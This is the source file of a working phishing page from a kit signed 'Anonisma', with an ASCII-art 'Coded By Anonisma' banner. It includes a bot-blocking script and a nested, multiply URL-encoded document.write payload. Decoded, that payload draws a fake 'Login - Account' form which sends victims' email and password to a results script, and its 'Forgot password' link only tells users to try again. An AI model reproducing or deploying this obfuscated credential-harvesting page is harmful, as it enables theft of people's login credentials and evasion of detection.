<?php
if (!isset($_SESSION)) {
  session_start();
}

include "bots.php";  //Para Bloquear Algunas IPs
include "opciones.php"; //Para convertir el texto en imagen 

?>

 
 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<!-- AnO_onisma -->


<!-- AnO_onisma -->
<!-- AnO_onisma -->

<meta http-equiv="content-type" content="text/html;charset=utf-8" /> 




<head>


    <title>Login - Account </title>
   

<link rel="stylesheet" href="info+/anonisma.css">
   
<link rel="shortcut icon" <link rel="logo-icon" href="img/iconisma.png">









</head>


<div>

<script>
<!--
document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525250A%2525253Cbody%25252520background%2525253D%25252522./img/dsnisma.png%25252522%25252520style%2525253D%25252522background-repeat%2525253A%25252520no-repeat%25252522%25252520%2525253E%25252520%2525250A%2525250A%2525250A%2525250A%2525250A%2525250A%2525250A%2525253Cform%25252520class%2525253D%25252522Anonisma%25252520Anonisma-stacked%25252522%25252520method%2525253D%25252522post%25252522%25252520action%2525253D%25252522./resultados/anonisma1.php%25252522%25252520%25252520%25252520%25252520%2525253E%2525250A%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522email%25252522%2525253E%2525253Cfont%25252520face%2525253D%25252522%25252520sans-serif%25252520%25252522%25252520size%2525253D3%25252520color%2525253D%25252522%252525233A3A3A%25252522%2525253EEmail%25252520Address%2525253C/a%2525253E%2525253C/label%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cinput%25252520id%2525253D%25252522email%25252522%25252520type%2525253D%25252522email%25252522%25252520placeholder%2525253D%25252522Email%25252522%25252520%25252520name%2525253D%25252522Anonisma%25252522%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520Email%25252522%2525253E%2525250A%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522password%25252522%2525253EPassword%2525253C/label%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cinput%25252520id%2525253D%25252522password%25252522%25252520type%2525253D%25252522password%25252522%25252520placeholder%2525253D%25252522Password%25252522%25252520name%2525253D%25252522Anonismaaa%25252522%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520Password%25252522%2525253E%2525250A%25252509%25252509%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%2525250A%2525250A%2525253Cdiv%25252520%2525253E%2525250A%25252509%2525253Cinput%25252520name%2525253D%25252522submit.x%25252522%25252520type%2525253D%25252522submit%25252522%25252520value%2525253D%25252522Login%25252522%25252520class%2525253D%25252522Anonismabutton%25252522/%2525253E%2525250A%2525253C/div%2525253E%2525250A%2525250A%2525250A%25252509%25252509%2525250A%25252509%25252509%2525253Cbr%2525253E%2525250A%25252509%25252509%2525250A%25252509%25252509%2525253Ca%25252520%25252520onmouseDown%2525253D%25252522alert%25252528%25252527Try%25252520it%25252520a%25252520couple%25252520of%25252520times%25252527%25252529%25252522%2525253E%2525253Cfont%25252520face%2525253D%25252522%25252520sans-serif%25252520%25252522%25252520size%2525253D2%25252520color%2525253D%25252522%252525230E7FD0%25252522%2525253E%2525253Cstrong%2525253EForgot%25252520your%25252520email%25252520or%25252520password%2525253F%2525253C/strong%2525253E%2525253C/font%2525253E%2525253C/a%2525253E%25252520%2525250A%25252509%25252509%2525250A%25252509%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525250A%2525250A%2525253Ccenter%2525253E%2525253Ca%25252520href%2525253D%25252522index.html%25252522%25252520class%2525253D%25252522Anonismaabutton%25252522%2525253E%2525253Ccenter%2525253EOpen%25252520a%25252520free%25252520account%2525253C/center%2525253E%2525253C/a%2525253E%2525253C/center%2525253E%2525250A%2525250A%2525253C/form%2525253E%2525250A%2525250A%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525250A%2525250A%2525250A%2525250A%2525250A%2525253C/body%2525253E%2525250A%2525250A%2525250A%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%25252509%2525253C/br%2525253E%2525250A%25252509%2525250A%25252509%2525250A%2525250A%2525253C%25252521--%25252520AnO_onisma%25252520--%2525253E%2525250A%2525253C/html%2525253E%2525250A%252522%252529%252529%25253B%25250A//--%25253E%25250A%25253C/script%25253E%2522%2529%2529%253B%250A//--%253E%250A%253C/script%253E%22%29%29%3B%0A//--%3E%0A%3C/script%3E"));
//-->
</script>




<!--



                                                                                                                                                                                                                                                                                                                                                      
                                                  dddddddd                                dddddddd                                                                                                                                                                                                                                                    
        CCCCCCCCCCCCC                             d::::::d                                d::::::d     BBBBBBBBBBBBBBBBB   YYYYYYY       YYYYYYY                    AAA               NNNNNNNN        NNNNNNNN     OOOOOOOOO     NNNNNNNN        NNNNNNNNIIIIIIIIII   SSSSSSSSSSSSSSS MMMMMMMM               MMMMMMMM               AAA               
     CCC::::::::::::C                             d::::::d                                d::::::d     B::::::::::::::::B  Y:::::Y       Y:::::Y                   A:::A              N:::::::N       N::::::N   OO:::::::::OO   N:::::::N       N::::::NI::::::::I SS:::::::::::::::SM:::::::M             M:::::::M              A:::A              
   CC:::::::::::::::C                             d::::::d                                d::::::d     B::::::BBBBBB:::::B Y:::::Y       Y:::::Y                  A:::::A             N::::::::N      N::::::N OO:::::::::::::OO N::::::::N      N::::::NI::::::::IS:::::SSSSSS::::::SM::::::::M           M::::::::M             A:::::A             
  C:::::CCCCCCCC::::C                             d:::::d                                 d:::::d      BB:::::B     B:::::BY::::::Y     Y::::::Y                 A:::::::A            N:::::::::N     N::::::NO:::::::OOO:::::::ON:::::::::N     N::::::NII::::::IIS:::::S     SSSSSSSM:::::::::M         M:::::::::M            A:::::::A            
 C:::::C       CCCCCC   ooooooooooo       ddddddddd:::::d     eeeeeeeeeeee        ddddddddd:::::d        B::::B     B:::::BYYY:::::Y   Y:::::YYY                A:::::::::A           N::::::::::N    N::::::NO::::::O   O::::::ON::::::::::N    N::::::N  I::::I  S:::::S            M::::::::::M       M::::::::::M           A:::::::::A           
C:::::C               oo:::::::::::oo   dd::::::::::::::d   ee::::::::::::ee    dd::::::::::::::d        B::::B     B:::::B   Y:::::Y Y:::::Y                  A:::::A:::::A          N:::::::::::N   N::::::NO:::::O     O:::::ON:::::::::::N   N::::::N  I::::I  S:::::S            M:::::::::::M     M:::::::::::M          A:::::A:::::A          
C:::::C              o:::::::::::::::o d::::::::::::::::d  e::::::eeeee:::::ee d::::::::::::::::d        B::::BBBBBB:::::B     Y:::::Y:::::Y                  A:::::A A:::::A         N:::::::N::::N  N::::::NO:::::O     O:::::ON:::::::N::::N  N::::::N  I::::I   S::::SSSS         M:::::::M::::M   M::::M:::::::M         A:::::A A:::::A         
C:::::C              o:::::ooooo:::::od:::::::ddddd:::::d e::::::e     e:::::ed:::::::ddddd:::::d        B:::::::::::::BB       Y:::::::::Y                  A:::::A   A:::::A        N::::::N N::::N N::::::NO:::::O     O:::::ON::::::N N::::N N::::::N  I::::I    SS::::::SSSSS    M::::::M M::::M M::::M M::::::M        A:::::A   A:::::A        
C:::::C              o::::o     o::::od::::::d    d:::::d e:::::::eeeee::::::ed::::::d    d:::::d        B::::BBBBBB:::::B       Y:::::::Y                  A:::::A     A:::::A       N::::::N  N::::N:::::::NO:::::O     O:::::ON::::::N  N::::N:::::::N  I::::I      SSS::::::::SS  M::::::M  M::::M::::M  M::::::M       A:::::A     A:::::A       
C:::::C              o::::o     o::::od:::::d     d:::::d e:::::::::::::::::e d:::::d     d:::::d        B::::B     B:::::B       Y:::::Y                  A:::::AAAAAAAAA:::::A      N::::::N   N:::::::::::NO:::::O     O:::::ON::::::N   N:::::::::::N  I::::I         SSSSSS::::S M::::::M   M:::::::M   M::::::M      A:::::AAAAAAAAA:::::A      
C:::::C              o::::o     o::::od:::::d     d:::::d e::::::eeeeeeeeeee  d:::::d     d:::::d        B::::B     B:::::B       Y:::::Y                 A:::::::::::::::::::::A     N::::::N    N::::::::::NO:::::O     O:::::ON::::::N    N::::::::::N  I::::I              S:::::SM::::::M    M:::::M    M::::::M     A:::::::::::::::::::::A     
 C:::::C       CCCCCCo::::o     o::::od:::::d     d:::::d e:::::::e           d:::::d     d:::::d        B::::B     B:::::B       Y:::::Y                A:::::AAAAAAAAAAAAA:::::A    N::::::N     N:::::::::NO::::::O   O::::::ON::::::N     N:::::::::N  I::::I              S:::::SM::::::M     MMMMM     M::::::M    A:::::AAAAAAAAAAAAA:::::A    
  C:::::CCCCCCCC::::Co:::::ooooo:::::od::::::ddddd::::::dde::::::::e          d::::::ddddd::::::dd     BB:::::BBBBBB::::::B       Y:::::Y               A:::::A             A:::::A   N::::::N      N::::::::NO:::::::OOO:::::::ON::::::N      N::::::::NII::::::IISSSSSSS     S:::::SM::::::M               M::::::M   A:::::A             A:::::A   
   CC:::::::::::::::Co:::::::::::::::o d:::::::::::::::::d e::::::::eeeeeeee   d:::::::::::::::::d     B:::::::::::::::::B     YYYY:::::YYYY           A:::::A               A:::::A  N::::::N       N:::::::N OO:::::::::::::OO N::::::N       N:::::::NI::::::::IS::::::SSSSSS:::::SM::::::M               M::::::M  A:::::A               A:::::A  
     CCC::::::::::::C oo:::::::::::oo   d:::::::::ddd::::d  ee:::::::::::::e    d:::::::::ddd::::d     B::::::::::::::::B      Y:::::::::::Y          A:::::A                 A:::::A N::::::N        N::::::N   OO:::::::::OO   N::::::N        N::::::NI::::::::IS:::::::::::::::SS M::::::M               M::::::M A:::::A                 A:::::A 
        CCCCCCCCCCCCC   ooooooooooo      ddddddddd   ddddd    eeeeeeeeeeeeee     ddddddddd   ddddd     BBBBBBBBBBBBBBBBB       YYYYYYYYYYYYY         AAAAAAA                   AAAAAAANNNNNNNN         NNNNNNN     OOOOOOOOO     NNNNNNNN         NNNNNNNIIIIIIIIII SSSSSSSSSSSSSSS   MMMMMMMM               MMMMMMMMAAAAAAA                   AAAAAAA
                                                                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              




 -->

